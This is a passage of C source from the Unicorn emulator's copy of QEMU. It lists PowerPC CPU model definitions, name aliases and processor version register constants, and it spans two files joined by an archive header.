"MPC8572E", CPU_POWERPC_MPC8572E, POWERPC_SVR_8572E, e500v2) /* e600 family */ POWERPC_DEF("e600", CPU_POWERPC_e600, e600, "PowerPC e600 core") /* PowerPC e600 microcontrollers */ POWERPC_DEF_SVR("mpc8610", "MPC8610", CPU_POWERPC_MPC8610, POWERPC_SVR_8610, e600) POWERPC_DEF_SVR("mpc8641", "MPC8641", CPU_POWERPC_MPC8641, POWERPC_SVR_8641, e600) POWERPC_DEF_SVR("mpc8641d", "MPC8641D", CPU_POWERPC_MPC8641D, POWERPC_SVR_8641D, e600) /* 32 bits "classic" PowerPC */ /* PowerPC 6xx family */ POWERPC_DEF("601_v0", CPU_POWERPC_601_v0, 601, "PowerPC 601v0") POWERPC_DEF("601_v1", CPU_POWERPC_601_v1, 601, "PowerPC 601v1") POWERPC_DEF("601_v2", CPU_POWERPC_601_v2, 601v, "PowerPC 601v2") POWERPC_DEF("602", CPU_POWERPC_602, 602, "PowerPC 602") POWERPC_DEF("603", CPU_POWERPC_603, 603, "PowerPC 603") POWERPC_DEF("603e_v1.1", CPU_POWERPC_603E_v11, 603E, "PowerPC 603e v1.1") POWERPC_DEF("603e_v1.2", CPU_POWERPC_603E_v12, 603E, "PowerPC 603e v1.2") POWERPC_DEF("603e_v1.3", CPU_POWERPC_603E_v13, 603E, "PowerPC 603e v1.3") POWERPC_DEF("603e_v1.4", CPU_POWERPC_603E_v14, 603E, "PowerPC 603e v1.4") POWERPC_DEF("603e_v2.2", CPU_POWERPC_603E_v22, 603E, "PowerPC 603e v2.2") POWERPC_DEF("603e_v3", CPU_POWERPC_603E_v3, 603E, "PowerPC 603e v3") POWERPC_DEF("603e_v4", CPU_POWERPC_603E_v4, 603E, "PowerPC 603e v4") POWERPC_DEF("603e_v4.1", CPU_POWERPC_603E_v41, 603E, "PowerPC 603e v4.1") POWERPC_DEF("603e7", CPU_POWERPC_603E7, 603E, "PowerPC 603e (aka PID7)") POWERPC_DEF("603e7t", CPU_POWERPC_603E7t, 603E, "PowerPC 603e7t") POWERPC_DEF("603e7v", CPU_POWERPC_603E7v, 603E, "PowerPC 603e7v") POWERPC_DEF("603e7v1", CPU_POWERPC_603E7v1, 603E, "PowerPC 603e7v1") POWERPC_DEF("603e7v2", CPU_POWERPC_603E7v2, 603E, "PowerPC 603e7v2") POWERPC_DEF("603p", CPU_POWERPC_603P, 603E, "PowerPC 603p (aka PID7v)") POWERPC_DEF("604", CPU_POWERPC_604, 604, "PowerPC 604") POWERPC_DEF("604e_v1.0", CPU_POWERPC_604E_v10, 604E, "PowerPC 604e v1.0") POWERPC_DEF("604e_v2.2", CPU_POWERPC_604E_v22, 604E, "PowerPC 604e v2.2") POWERPC_DEF("604e_v2.4", CPU_POWERPC_604E_v24, 604E, "PowerPC 604e v2.4") POWERPC_DEF("604r", CPU_POWERPC_604R, 604E, "PowerPC 604r (aka PIDA)") /* PowerPC 7xx family */ POWERPC_DEF("740_v1.0", CPU_POWERPC_7x0_v10, 740, "PowerPC 740 v1.0 (G3)") POWERPC_DEF("750_v1.0", CPU_POWERPC_7x0_v10, 750, "PowerPC 750 v1.0 (G3)") POWERPC_DEF("740_v2.0", CPU_POWERPC_7x0_v20, 740, "PowerPC 740 v2.0 (G3)") POWERPC_DEF("750_v2.0", CPU_POWERPC_7x0_v20, 750, "PowerPC 750 v2.0 (G3)") POWERPC_DEF("740_v2.1", CPU_POWERPC_7x0_v21, 740, "PowerPC 740 v2.1 (G3)") POWERPC_DEF("750_v2.1", CPU_POWERPC_7x0_v21, 750, "PowerPC 750 v2.1 (G3)") POWERPC_DEF("740_v2.2", CPU_POWERPC_7x0_v22, 740, "PowerPC 740 v2.2 (G3)") POWERPC_DEF("750_v2.2", CPU_POWERPC_7x0_v22, 750, "PowerPC 750 v2.2 (G3)") POWERPC_DEF("740_v3.0", CPU_POWERPC_7x0_v30, 740, "PowerPC 740 v3.0 (G3)") POWERPC_DEF("750_v3.0", CPU_POWERPC_7x0_v30, 750, "PowerPC 750 v3.0 (G3)") POWERPC_DEF("740_v3.1", CPU_POWERPC_7x0_v31, 740, "PowerPC 740 v3.1 (G3)") POWERPC_DEF("750_v3.1", CPU_POWERPC_7x0_v31, 750, "PowerPC 750 v3.1 (G3)") POWERPC_DEF("740e", CPU_POWERPC_740E, 740, "PowerPC 740E (G3)") POWERPC_DEF("750e", CPU_POWERPC_750E, 750, "PowerPC 750E (G3)") POWERPC_DEF("740p", CPU_POWERPC_7x0P, 740, "PowerPC 740P (G3)") POWERPC_DEF("750p", CPU_POWERPC_7x0P, 750, "PowerPC 750P (G3)") POWERPC_DEF("750cl_v1.0", CPU_POWERPC_750CL_v10, 750cl, "PowerPC 750CL v1.0") POWERPC_DEF("750cl_v2.0", CPU_POWERPC_750CL_v20, 750cl, "PowerPC 750CL v2.0") POWERPC_DEF("750cx_v1.0", CPU_POWERPC_750CX_v10, 750cx, "PowerPC 750CX v1.0 (G3 embedded)") POWERPC_DEF("750cx_v2.0", CPU_POWERPC_750CX_v20, 750cx, "PowerPC 750CX v2.1 (G3 embedded)") POWERPC_DEF("750cx_v2.1", CPU_POWERPC_750CX_v21, 750cx, "PowerPC 750CX v2.1 (G3 embedded)") POWERPC_DEF("750cx_v2.2", CPU_POWERPC_750CX_v22, 750cx, "PowerPC 750CX v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.1", CPU_POWERPC_750CXE_v21, 750cx, "PowerPC 750CXe v2.1 (G3 embedded)") POWERPC_DEF("750cxe_v2.2", CPU_POWERPC_750CXE_v22, 750cx, "PowerPC 750CXe v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.3", CPU_POWERPC_750CXE_v23, 750cx, "PowerPC 750CXe v2.3 (G3 embedded)") POWERPC_DEF("750cxe_v2.4", CPU_POWERPC_750CXE_v24, 750cx, "PowerPC 750CXe v2.4 (G3 embedded)") POWERPC_DEF("750cxe_v2.4b", CPU_POWERPC_750CXE_v24b, 750cx, "PowerPC 750CXe v2.4b (G3 embedded)") POWERPC_DEF("750cxe_v3.0", CPU_POWERPC_750CXE_v30, 750cx, "PowerPC 750CXe v3.0 (G3 embedded)") POWERPC_DEF("750cxe_v3.1", CPU_POWERPC_750CXE_v31, 750cx, "PowerPC 750CXe v3.1 (G3 embedded)") POWERPC_DEF("750cxe_v3.1b", CPU_POWERPC_750CXE_v31b, 750cx, "PowerPC 750CXe v3.1b (G3 embedded)") POWERPC_DEF("750cxr", CPU_POWERPC_750CXR, 750cx, "PowerPC 750CXr (G3 embedded)") POWERPC_DEF("750fl", CPU_POWERPC_750FL, 750fx, "PowerPC 750FL (G3 embedded)") POWERPC_DEF("750fx_v1.0", CPU_POWERPC_750FX_v10, 750fx, "PowerPC 750FX v1.0 (G3 embedded)") POWERPC_DEF("750fx_v2.0", CPU_POWERPC_750FX_v20, 750fx, "PowerPC 750FX v2.0 (G3 embedded)") POWERPC_DEF("750fx_v2.1", CPU_POWERPC_750FX_v21, 750fx, "PowerPC 750FX v2.1 (G3 embedded)") POWERPC_DEF("750fx_v2.2", CPU_POWERPC_750FX_v22, 750fx, "PowerPC 750FX v2.2 (G3 embedded)") POWERPC_DEF("750fx_v2.3", CPU_POWERPC_750FX_v23, 750fx, "PowerPC 750FX v2.3 (G3 embedded)") POWERPC_DEF("750gl", CPU_POWERPC_750GL, 750gx, "PowerPC 750GL (G3 embedded)") POWERPC_DEF("750gx_v1.0", CPU_POWERPC_750GX_v10, 750gx, "PowerPC 750GX v1.0 (G3 embedded)") POWERPC_DEF("750gx_v1.1", CPU_POWERPC_750GX_v11, 750gx, "PowerPC 750GX v1.1 (G3 embedded)") POWERPC_DEF("750gx_v1.2", CPU_POWERPC_750GX_v12, 750gx, "PowerPC 750GX v1.2 (G3 embedded)") POWERPC_DEF("750l_v2.0", CPU_POWERPC_750L_v20, 750, "PowerPC 750L v2.0 (G3 embedded)") POWERPC_DEF("750l_v2.1", CPU_POWERPC_750L_v21, 750, "PowerPC 750L v2.1 (G3 embedded)") POWERPC_DEF("750l_v2.2", CPU_POWERPC_750L_v22, 750, "PowerPC 750L v2.2 (G3 embedded)") POWERPC_DEF("750l_v3.0", CPU_POWERPC_750L_v30, 750, "PowerPC 750L v3.0 (G3 embedded)") POWERPC_DEF("750l_v3.2", CPU_POWERPC_750L_v32, 750, "PowerPC 750L v3.2 (G3 embedded)") POWERPC_DEF("745_v1.0", CPU_POWERPC_7x5_v10, 745, "PowerPC 745 v1.0") POWERPC_DEF("755_v1.0", CPU_POWERPC_7x5_v10, 755, "PowerPC 755 v1.0") POWERPC_DEF("745_v1.1", CPU_POWERPC_7x5_v11, 745, "PowerPC 745 v1.1") POWERPC_DEF("755_v1.1", CPU_POWERPC_7x5_v11, 755, "PowerPC 755 v1.1") POWERPC_DEF("745_v2.0", CPU_POWERPC_7x5_v20, 745, "PowerPC 745 v2.0") POWERPC_DEF("755_v2.0", CPU_POWERPC_7x5_v20, 755, "PowerPC 755 v2.0") POWERPC_DEF("745_v2.1", CPU_POWERPC_7x5_v21, 745, "PowerPC 745 v2.1") POWERPC_DEF("755_v2.1", CPU_POWERPC_7x5_v21, 755, "PowerPC 755 v2.1") POWERPC_DEF("745_v2.2", CPU_POWERPC_7x5_v22, 745, "PowerPC 745 v2.2") POWERPC_DEF("755_v2.2", CPU_POWERPC_7x5_v22, 755, "PowerPC 755 v2.2") POWERPC_DEF("745_v2.3", CPU_POWERPC_7x5_v23, 745, "PowerPC 745 v2.3") POWERPC_DEF("755_v2.3", CPU_POWERPC_7x5_v23, 755, "PowerPC 755 v2.3") POWERPC_DEF("745_v2.4", CPU_POWERPC_7x5_v24, 745, "PowerPC 745 v2.4") POWERPC_DEF("755_v2.4", CPU_POWERPC_7x5_v24, 755, "PowerPC 755 v2.4") POWERPC_DEF("745_v2.5", CPU_POWERPC_7x5_v25, 745, "PowerPC 745 v2.5") POWERPC_DEF("755_v2.5", CPU_POWERPC_7x5_v25, 755, "PowerPC 755 v2.5") POWERPC_DEF("745_v2.6", CPU_POWERPC_7x5_v26, 745, "PowerPC 745 v2.6") POWERPC_DEF("755_v2.6", CPU_POWERPC_7x5_v26, 755, "PowerPC 755 v2.6") POWERPC_DEF("745_v2.7", CPU_POWERPC_7x5_v27, 745, "PowerPC 745 v2.7") POWERPC_DEF("755_v2.7", CPU_POWERPC_7x5_v27, 755, "PowerPC 755 v2.7") POWERPC_DEF("745_v2.8", CPU_POWERPC_7x5_v28, 745, "PowerPC 745 v2.8") POWERPC_DEF("755_v2.8", CPU_POWERPC_7x5_v28, 755, "PowerPC 755 v2.8") /* PowerPC 74xx family */ POWERPC_DEF("7400_v1.0", CPU_POWERPC_7400_v10, 7400, "PowerPC 7400 v1.0 (G4)") POWERPC_DEF("7400_v1.1", CPU_POWERPC_7400_v11, 7400, "PowerPC 7400 v1.1 (G4)") POWERPC_DEF("7400_v2.0", CPU_POWERPC_7400_v20, 7400, "PowerPC 7400 v2.0 (G4)") POWERPC_DEF("7400_v2.1", CPU_POWERPC_7400_v21, 7400, "PowerPC 7400 v2.1 (G4)") POWERPC_DEF("7400_v2.2", CPU_POWERPC_7400_v22, 7400, "PowerPC 7400 v2.2 (G4)") POWERPC_DEF("7400_v2.6", CPU_POWERPC_7400_v26, 7400, "PowerPC 7400 v2.6 (G4)") POWERPC_DEF("7400_v2.7", CPU_POWERPC_7400_v27, 7400, "PowerPC 7400 v2.7 (G4)") POWERPC_DEF("7400_v2.8", CPU_POWERPC_7400_v28, 7400, "PowerPC 7400 v2.8 (G4)") POWERPC_DEF("7400_v2.9", CPU_POWERPC_7400_v29, 7400, "PowerPC 7400 v2.9 (G4)") POWERPC_DEF("7410_v1.0", CPU_POWERPC_7410_v10, 7410, "PowerPC 7410 v1.0 (G4)") POWERPC_DEF("7410_v1.1", CPU_POWERPC_7410_v11, 7410, "PowerPC 7410 v1.1 (G4)") POWERPC_DEF("7410_v1.2", CPU_POWERPC_7410_v12, 7410, "PowerPC 7410 v1.2 (G4)") POWERPC_DEF("7410_v1.3", CPU_POWERPC_7410_v13, 7410, "PowerPC 7410 v1.3 (G4)") POWERPC_DEF("7410_v1.4", CPU_POWERPC_7410_v14, 7410, "PowerPC 7410 v1.4 (G4)") POWERPC_DEF("7448_v1.0", CPU_POWERPC_7448_v10, 7400, "PowerPC 7448 v1.0 (G4)") POWERPC_DEF("7448_v1.1", CPU_POWERPC_7448_v11, 7400, "PowerPC 7448 v1.1 (G4)") POWERPC_DEF("7448_v2.0", CPU_POWERPC_7448_v20, 7400, "PowerPC 7448 v2.0 (G4)") POWERPC_DEF("7448_v2.1", CPU_POWERPC_7448_v21, 7400, "PowerPC 7448 v2.1 (G4)") POWERPC_DEF("7450_v1.0", CPU_POWERPC_7450_v10, 7450, "PowerPC 7450 v1.0 (G4)") POWERPC_DEF("7450_v1.1", CPU_POWERPC_7450_v11, 7450, "PowerPC 7450 v1.1 (G4)") POWERPC_DEF("7450_v1.2", CPU_POWERPC_7450_v12, 7450, "PowerPC 7450 v1.2 (G4)") POWERPC_DEF("7450_v2.0", CPU_POWERPC_7450_v20, 7450, "PowerPC 7450 v2.0 (G4)") POWERPC_DEF("7450_v2.1", CPU_POWERPC_7450_v21, 7450, "PowerPC 7450 v2.1 (G4)") POWERPC_DEF("7441_v2.1", CPU_POWERPC_7450_v21, 7440, "PowerPC 7441 v2.1 (G4)") POWERPC_DEF("7441_v2.3", CPU_POWERPC_74x1_v23, 7440, "PowerPC 7441 v2.3 (G4)") POWERPC_DEF("7451_v2.3", CPU_POWERPC_74x1_v23, 7450, "PowerPC 7451 v2.3 (G4)") POWERPC_DEF("7441_v2.10", CPU_POWERPC_74x1_v210, 7440, "PowerPC 7441 v2.10 (G4)") POWERPC_DEF("7451_v2.10", CPU_POWERPC_74x1_v210, 7450, "PowerPC 7451 v2.10 (G4)") POWERPC_DEF("7445_v1.0", CPU_POWERPC_74x5_v10, 7445, "PowerPC 7445 v1.0 (G4)") POWERPC_DEF("7455_v1.0", CPU_POWERPC_74x5_v10, 7455, "PowerPC 7455 v1.0 (G4)") POWERPC_DEF("7445_v2.1", CPU_POWERPC_74x5_v21, 7445, "PowerPC 7445 v2.1 (G4)") POWERPC_DEF("7455_v2.1", CPU_POWERPC_74x5_v21, 7455, "PowerPC 7455 v2.1 (G4)") POWERPC_DEF("7445_v3.2", CPU_POWERPC_74x5_v32, 7445, "PowerPC 7445 v3.2 (G4)") POWERPC_DEF("7455_v3.2", CPU_POWERPC_74x5_v32, 7455, "PowerPC 7455 v3.2 (G4)") POWERPC_DEF("7445_v3.3", CPU_POWERPC_74x5_v33, 7445, "PowerPC 7445 v3.3 (G4)") POWERPC_DEF("7455_v3.3", CPU_POWERPC_74x5_v33, 7455, "PowerPC 7455 v3.3 (G4)") POWERPC_DEF("7445_v3.4", CPU_POWERPC_74x5_v34, 7445, "PowerPC 7445 v3.4 (G4)") POWERPC_DEF("7455_v3.4", CPU_POWERPC_74x5_v34, 7455, "PowerPC 7455 v3.4 (G4)") POWERPC_DEF("7447_v1.0", CPU_POWERPC_74x7_v10, 7445, "PowerPC 7447 v1.0 (G4)") POWERPC_DEF("7457_v1.0", CPU_POWERPC_74x7_v10, 7455, "PowerPC 7457 v1.0 (G4)") POWERPC_DEF("7447_v1.1", CPU_POWERPC_74x7_v11, 7445, "PowerPC 7447 v1.1 (G4)") POWERPC_DEF("7457_v1.1", CPU_POWERPC_74x7_v11, 7455, "PowerPC 7457 v1.1 (G4)") POWERPC_DEF("7457_v1.2", CPU_POWERPC_74x7_v12, 7455, "PowerPC 7457 v1.2 (G4)") POWERPC_DEF("7447a_v1.0", CPU_POWERPC_74x7A_v10, 7445, "PowerPC 7447A v1.0 (G4)") POWERPC_DEF("7457a_v1.0", CPU_POWERPC_74x7A_v10, 7455, "PowerPC 7457A v1.0 (G4)") POWERPC_DEF("7447a_v1.1", CPU_POWERPC_74x7A_v11, 7445, "PowerPC 7447A v1.1 (G4)") POWERPC_DEF("7457a_v1.1", CPU_POWERPC_74x7A_v11, 7455, "PowerPC 7457A v1.1 (G4)") POWERPC_DEF("7447a_v1.2", CPU_POWERPC_74x7A_v12, 7445, "PowerPC 7447A v1.2 (G4)") POWERPC_DEF("7457a_v1.2", CPU_POWERPC_74x7A_v12, 7455, "PowerPC 7457A v1.2 (G4)") /* 64 bits PowerPC */ #if defined(TARGET_PPC64) POWERPC_DEF("970_v2.2", CPU_POWERPC_970_v22, 970, "PowerPC 970 v2.2") POWERPC_DEF("970fx_v1.0", CPU_POWERPC_970FX_v10, 970, "PowerPC 970FX v1.0 (G5)") POWERPC_DEF("970fx_v2.0", CPU_POWERPC_970FX_v20, 970, "PowerPC 970FX v2.0 (G5)") POWERPC_DEF("970fx_v2.1", CPU_POWERPC_970FX_v21, 970, "PowerPC 970FX v2.1 (G5)") POWERPC_DEF("970fx_v3.0", CPU_POWERPC_970FX_v30, 970, "PowerPC 970FX v3.0 (G5)") POWERPC_DEF("970fx_v3.1", CPU_POWERPC_970FX_v31, 970, "PowerPC 970FX v3.1 (G5)") POWERPC_DEF("970mp_v1.0", CPU_POWERPC_970MP_v10, 970, "PowerPC 970MP v1.0") POWERPC_DEF("970mp_v1.1", CPU_POWERPC_970MP_v11, 970, "PowerPC 970MP v1.1") POWERPC_DEF("power5+_v2.1", CPU_POWERPC_POWER5P_v21, POWER5P, "POWER5+ v2.1") POWERPC_DEF("power7_v2.3", CPU_POWERPC_POWER7_v23, POWER7, "POWER7 v2.3") POWERPC_DEF("power7+_v2.1", CPU_POWERPC_POWER7P_v21, POWER7, "POWER7+ v2.1") POWERPC_DEF("power8e_v2.1", CPU_POWERPC_POWER8E_v21, POWER8, "POWER8E v2.1") POWERPC_DEF("power8_v2.0", CPU_POWERPC_POWER8_v20, POWER8, "POWER8 v2.0") POWERPC_DEF("power8nvl_v1.0", CPU_POWERPC_POWER8NVL_v10, POWER8, "POWER8NVL v1.0") POWERPC_DEF("power9_v1.0", CPU_POWERPC_POWER9_DD1, POWER9, "POWER9 v1.0") POWERPC_DEF("power9_v2.0", CPU_POWERPC_POWER9_DD20, POWER9, "POWER9 v2.0") POWERPC_DEF("power10_v1.0", CPU_POWERPC_POWER10_DD1, POWER10, "POWER10 v1.0") #endif /* defined (TARGET_PPC64) */ /***************************************************************************/ /* PowerPC CPU aliases */ PowerPCCPUAlias ppc_cpu_aliases[] = { { "403", "403gc" }, { "405", "405d4" }, { "405cr", "405crc" }, { "405gp", "405gpd" }, { "405gpe", "405crc" }, { "x2vp7", "x2vp4" }, { "x2vp50", "x2vp20" }, { "440ep", "440epb" }, { "460ex", "460exb" }, #if defined(TODO_USER_ONLY) { "440gp", "440gpc" }, { "440gr", "440gra" }, { "440gx", "440gxf" }, { "rcpu", "mpc5xx" }, /* MPC5xx microcontrollers */ { "mgt560", "mpc5xx" }, { "mpc509", "mpc5xx" }, { "mpc533", "mpc5xx" }, { "mpc534", "mpc5xx" }, { "mpc555", "mpc5xx" }, { "mpc556", "mpc5xx" }, { "mpc560", "mpc5xx" }, { "mpc561", "mpc5xx" }, { "mpc562", "mpc5xx" }, { "mpc563", "mpc5xx" }, { "mpc564", "mpc5xx" }, { "mpc565", "mpc5xx" }, { "mpc566", "mpc5xx" }, { "powerquicc", "mpc8xx" }, /* MPC8xx microcontrollers */ { "mgt823", "mpc8xx" }, { "mpc821", "mpc8xx" }, { "mpc823", "mpc8xx" }, { "mpc850", "mpc8xx" }, { "mpc852t", "mpc8xx" }, { "mpc855t", "mpc8xx" }, { "mpc857", "mpc8xx" }, { "mpc859", "mpc8xx" }, { "mpc860", "mpc8xx" }, { "mpc862", "mpc8xx" }, { "mpc866", "mpc8xx" }, { "mpc870", "mpc8xx" }, { "mpc875", "mpc8xx" }, { "mpc880", "mpc8xx" }, { "mpc885", "mpc8xx" }, #endif /* PowerPC MPC603 microcontrollers */ { "mpc8240", "603" }, { "mpc52xx", "mpc5200_v12" }, { "mpc5200", "mpc5200_v12" }, { "mpc5200b", "mpc5200b_v21" }, { "mpc82xx", "g2legp3" }, { "powerquicc-ii", "g2legp3" }, { "mpc8241", "g2hip4" }, { "mpc8245", "g2hip4" }, { "mpc8247", "g2legp3" }, { "mpc8248", "g2legp3" }, { "mpc8250", "g2hip4" }, { "mpc8250_hip3", "g2hip3" }, { "mpc8250_hip4", "g2hip4" }, { "mpc8255", "g2hip4" }, { "mpc8255_hip3", "g2hip3" }, { "mpc8255_hip4", "g2hip4" }, { "mpc8260", "g2hip4" }, { "mpc8260_hip3", "g2hip3" }, { "mpc8260_hip4", "g2hip4" }, { "mpc8264", "g2hip4" }, { "mpc8264_hip3", "g2hip3" }, { "mpc8264_hip4", "g2hip4" }, { "mpc8265", "g2hip4" }, { "mpc8265_hip3", "g2hip3" }, { "mpc8265_hip4", "g2hip4" }, { "mpc8266", "g2hip4" }, { "mpc8266_hip3", "g2hip3" }, { "mpc8266_hip4", "g2hip4" }, { "mpc8270", "g2legp3" }, { "mpc8271", "g2legp3" }, { "mpc8272", "g2legp3" }, { "mpc8275", "g2legp3" }, { "mpc8280", "g2legp3" }, { "e200", "e200z6" }, { "e300", "e300c3" }, { "mpc8347", "mpc8347t" }, { "mpc8347a", "mpc8347at" }, { "mpc8347e", "mpc8347et" }, { "mpc8347ea", "mpc8347eat" }, { "e500", "e500v2_v22" }, { "e500v1", "e500_v20" }, { "e500v2", "e500v2_v22" }, { "mpc8533", "mpc8533_v11" }, { "mpc8533e", "mpc8533e_v11" }, { "mpc8540", "mpc8540_v21" }, { "mpc8541", "mpc8541_v11" }, { "mpc8541e", "mpc8541e_v11" }, { "mpc8543", "mpc8543_v21" }, { "mpc8543e", "mpc8543e_v21" }, { "mpc8544", "mpc8544_v11" }, { "mpc8544e", "mpc8544e_v11" }, { "mpc8545", "mpc8545_v21" }, { "mpc8545e", "mpc8545e_v21" }, { "mpc8547e", "mpc8547e_v21" }, { "mpc8548", "mpc8548_v21" }, { "mpc8548e", "mpc8548e_v21" }, { "mpc8555", "mpc8555_v11" }, { "mpc8555e", "mpc8555e_v11" }, { "mpc8560", "mpc8560_v21" }, { "601", "601_v2" }, { "601v", "601_v2" }, { "vanilla", "603" }, { "603e", "603e_v4.1" }, { "stretch", "603e_v4.1" }, { "vaillant", "603e7v" }, { "603r", "603e7t" }, { "goldeneye", "603e7t" }, { "604e", "604e_v2.4" }, { "sirocco", "604e_v2.4" }, { "mach5", "604r" }, { "740", "740_v3.1" }, { "arthur", "740_v3.1" }, { "750", "750_v3.1" }, { "typhoon", "750_v3.1" }, { "g3", "750_v3.1" }, { "conan/doyle", "750p" }, { "750cl", "750cl_v2.0" }, { "750cx", "750cx_v2.2" }, { "750cxe", "750cxe_v3.1b" }, { "750fx", "750fx_v2.3" }, { "750gx", "750gx_v1.2" }, { "750l", "750l_v3.2" }, { "lonestar", "750l_v3.2" }, { "745", "745_v2.8" }, { "755", "755_v2.8" }, { "goldfinger", "755_v2.8" }, { "7400", "7400_v2.9" }, { "max", "7400_v2.9" }, { "g4", "7400_v2.9" }, { "7410", "7410_v1.4" }, { "nitro", "7410_v1.4" }, { "7448", "7448_v2.1" }, { "7450", "7450_v2.1" }, { "vger", "7450_v2.1" }, { "7441", "7441_v2.3" }, { "7451", "7451_v2.3" }, { "7445", "7445_v3.2" }, { "7455", "7455_v3.2" }, { "apollo6", "7455_v3.2" }, { "7447", "7447_v1.1" }, { "7457", "7457_v1.2" }, { "apollo7", "7457_v1.2" }, { "7447a", "7447a_v1.2" }, { "7457a", "7457a_v1.2" }, { "apollo7pm", "7457a_v1.0" }, #if defined(TARGET_PPC64) { "970", "970_v2.2" }, { "970fx", "970fx_v3.1" }, { "970mp", "970mp_v1.1" }, { "power5+", "power5+_v2.1" }, { "power5gs", "power5+_v2.1" }, { "power7", "power7_v2.3" }, { "power7+", "power7+_v2.1" }, { "power8e", "power8e_v2.1" }, { "power8", "power8_v2.0" }, { "power8nvl", "power8nvl_v1.0" }, { "power9", "power9_v2.0" }, { "power10", "power10_v1.0" }, #endif /* Generic PowerPCs */ #if defined(TARGET_PPC64) { "ppc64", "970fx_v3.1" }, #endif { "ppc32", "604" }, { "ppc", "604" }, { "default", "604" }, { NULL, NULL } }; #endif �unicorn-2.1.1/qemu/target/ppc/cpu-models.h����������������������������������������������������������0000664�0000000�0000000�00000061031�14675241067�0020445�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC CPU initialization for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright 2011 Freescale Semiconductor, Inc. * Copyright 2013 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TARGET_PPC_CPU_MODELS_H #define TARGET_PPC_CPU_MODELS_H /** * PowerPCCPUAlias: * @alias: The alias name. * @model: The CPU model @alias refers to, that directly resolves into CPU type * * A mapping entry from CPU @alias to CPU @model. */ typedef struct PowerPCCPUAlias { const char *alias; const char *model; } PowerPCCPUAlias; extern PowerPCCPUAlias ppc_cpu_aliases[]; /*****************************************************************************/ /* PVR definitions for most known PowerPC */ enum { /* PowerPC 401 family */ /* Generic PowerPC 401 */ #define CPU_POWERPC_401 CPU_POWERPC_401G2 /* PowerPC 401 cores */ CPU_POWERPC_401A1 = 0x00210000, CPU_POWERPC_401B2 = 0x00220000, CPU_POWERPC_401C2 = 0x00230000, CPU_POWERPC_401D2 = 0x00240000, CPU_POWERPC_401E2 = 0x00250000, CPU_POWERPC_401F2 = 0x00260000, CPU_POWERPC_401G2 = 0x00270000, /* PowerPC 401 microcontrolers */ #define CPU_POWERPC_IOP480 CPU_POWERPC_401B2 /* IBM Processor for Network Resources */ CPU_POWERPC_COBRA = 0x10100000, /* XXX: 405 ? */ /* PowerPC 403 family */ /* PowerPC 403 microcontrollers */ CPU_POWERPC_403GA = 0x00200011, CPU_POWERPC_403GB = 0x00200100, CPU_POWERPC_403GC = 0x00200200, CPU_POWERPC_403GCX = 0x00201400, /* PowerPC 405 family */ /* PowerPC 405 cores */ CPU_POWERPC_405D2 = 0x20010000, CPU_POWERPC_405D4 = 0x41810000, /* PowerPC 405 microcontrolers */ /* XXX: missing 0x200108a0 */ CPU_POWERPC_405CRa = 0x40110041, CPU_POWERPC_405CRb = 0x401100C5, CPU_POWERPC_405CRc = 0x40110145, CPU_POWERPC_405EP = 0x51210950, CPU_POWERPC_405EZ = 0x41511460, /* 0x51210950 ? */ CPU_POWERPC_405GPa = 0x40110000, CPU_POWERPC_405GPb = 0x40110040, CPU_POWERPC_405GPc = 0x40110082, CPU_POWERPC_405GPd = 0x401100C4, CPU_POWERPC_405GPR = 0x50910951, CPU_POWERPC_405LP = 0x41F10000, /* IBM network processors */ CPU_POWERPC_NPE405H = 0x414100C0, CPU_POWERPC_NPE405H2 = 0x41410140, CPU_POWERPC_NPE405L = 0x416100C0, CPU_POWERPC_NPE4GS3 = 0x40B10000, /* IBM STBxxx (PowerPC 401/403/405 core based microcontrollers) */ CPU_POWERPC_STB03 = 0x40310000, /* 0x40130000 ? */ CPU_POWERPC_STB04 = 0x41810000, CPU_POWERPC_STB25 = 0x51510950, /* Xilinx cores */ CPU_POWERPC_X2VP4 = 0x20010820, CPU_POWERPC_X2VP20 = 0x20010860, /* PowerPC 440 family */ /* Generic PowerPC 440 */ #define CPU_POWERPC_440 CPU_POWERPC_440GXf /* PowerPC 440 cores */ CPU_POWERPC_440_XILINX = 0x7ff21910, /* PowerPC 440 microcontrolers */ CPU_POWERPC_440EPa = 0x42221850, CPU_POWERPC_440EPb = 0x422218D3, CPU_POWERPC_440GPb = 0x40120440, CPU_POWERPC_440GPc = 0x40120481, #define CPU_POWERPC_440GRa CPU_POWERPC_440EPb CPU_POWERPC_440GRX = 0x200008D0, #define CPU_POWERPC_440EPX CPU_POWERPC_440GRX CPU_POWERPC_440GXa = 0x51B21850, CPU_POWERPC_440GXb = 0x51B21851, CPU_POWERPC_440GXc = 0x51B21892, CPU_POWERPC_440GXf = 0x51B21894, CPU_POWERPC_440SP = 0x53221850, CPU_POWERPC_440SP2 = 0x53221891, CPU_POWERPC_440SPE = 0x53421890, CPU_POWERPC_460EXb = 0x130218A4, /* called 460 but 440 core */ /* Freescale embedded PowerPC cores */ /* PowerPC MPC 5xx cores (aka RCPU) */ CPU_POWERPC_MPC5xx = 0x00020020, /* PowerPC MPC 8xx cores (aka PowerQUICC) */ CPU_POWERPC_MPC8xx = 0x00500000, /* G2 cores (aka PowerQUICC-II) */ CPU_POWERPC_G2 = 0x00810011, CPU_POWERPC_G2H4 = 0x80811010, CPU_POWERPC_G2gp = 0x80821010, CPU_POWERPC_G2ls = 0x90810010, CPU_POWERPC_MPC603 = 0x00810100, CPU_POWERPC_G2_HIP3 = 0x00810101, CPU_POWERPC_G2_HIP4 = 0x80811014, /* G2_LE core (aka PowerQUICC-II) */ CPU_POWERPC_G2LE = 0x80820010, CPU_POWERPC_G2LEgp = 0x80822010, CPU_POWERPC_G2LEls = 0xA0822010, CPU_POWERPC_G2LEgp1 = 0x80822011, CPU_POWERPC_G2LEgp3 = 0x80822013, /* MPC52xx microcontrollers */ /* XXX: MPC 5121 ? */ #define CPU_POWERPC_MPC5200_v10 CPU_POWERPC_G2LEgp1 #define 